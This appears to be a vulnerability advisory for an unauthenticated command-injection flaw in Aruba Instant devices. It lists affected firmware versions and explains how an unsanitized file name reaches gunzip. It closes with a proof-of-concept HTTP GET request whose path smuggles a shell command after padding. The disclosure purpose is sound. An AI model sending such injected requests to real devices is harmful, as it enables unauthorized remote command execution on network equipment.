- Aruba Instant
- Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below - Aruba Instant 6.5.x: 6.5.4.18 and below - Aruba Instant 8.3.x: 8.3.0.14 and below - Aruba Instant 8.5.x: 8.5.0.11 and below - Aruba Instant 8.6.x: 8.6.0.7 and below - Aruba Instant 8.7.x: 8.7.1.1 and below
An unauthenticated attacker can execute arbitrary commands on Aruba Instant devices, to be able to exploit this vulnerability the attacker has to put a file with a command in the file name in the HTTP directory.
All the files in the webserver directory are compressed with gzip compression. If a client requests a file without accepting gzip then the webserver will do the uncompression for him and execute gunzip.
The filename parameter is unsanitized and can be used to execute arbitrary commands. An attacker can create a file with @CVE-2021-25159 and execute commands.
A simple GET request can trigger this vulnerability after using @CVE-2021-25159 and @CVE-2021-25156.
GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';%20ps%20#aaaaaaaaaaaaaaaaaaa HTTP/1.1
Host: IP:4343
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Language: en-US,en;q=0.9